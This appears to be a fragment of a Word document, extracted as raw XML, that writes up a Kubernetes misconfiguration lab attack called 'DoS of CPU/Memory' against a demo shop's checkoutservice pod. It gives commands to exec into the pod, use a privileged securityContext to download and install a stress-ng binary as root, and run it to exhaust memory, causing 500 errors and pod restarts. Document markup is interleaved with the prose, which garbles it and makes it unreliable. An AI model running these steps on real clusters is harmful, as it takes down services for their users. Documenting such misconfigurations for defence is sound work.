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Attack#4 DoS of CPU/Memory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Related configurations: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Attack#4.json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Apply all insecure configs in Attack#4.json.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kubectl exec -it checkoutservice- -n default -- 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attacker can exploit privileged securityContext to use root permission(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#1, #2, #4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to install stress-ng tool from the container for misconfiguration </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#3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Install stress-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B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wget https://github.com/Billyas/stress-ng-static/releases/download/1.0/stress-ng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chmod +x stress-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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 mv stress-ng /usr/local/bin/stress-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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attacker can access to more resources by running following command with misconfiguration </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#4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CPU/Memory usage before attacker accesses to more resources</w:t>
      </w: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stress-ng --vm 2 --vm-bytes 5G --timeout 30s</w:t>
      </w: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top</w:t>
      </w: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this command to intentionally waste CPU and Memory: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stress-ng --vm 20 --vm-bytes 50G --timeout 3m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Observed application is hanging until the command terminated, website returns 500 error, and some pods restarted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kubectl describe pod checkoutservice -n default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2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drive.google.com/open?id=1X1QoBH0DelTQ-pbDERu4ixc9bqGUhU8M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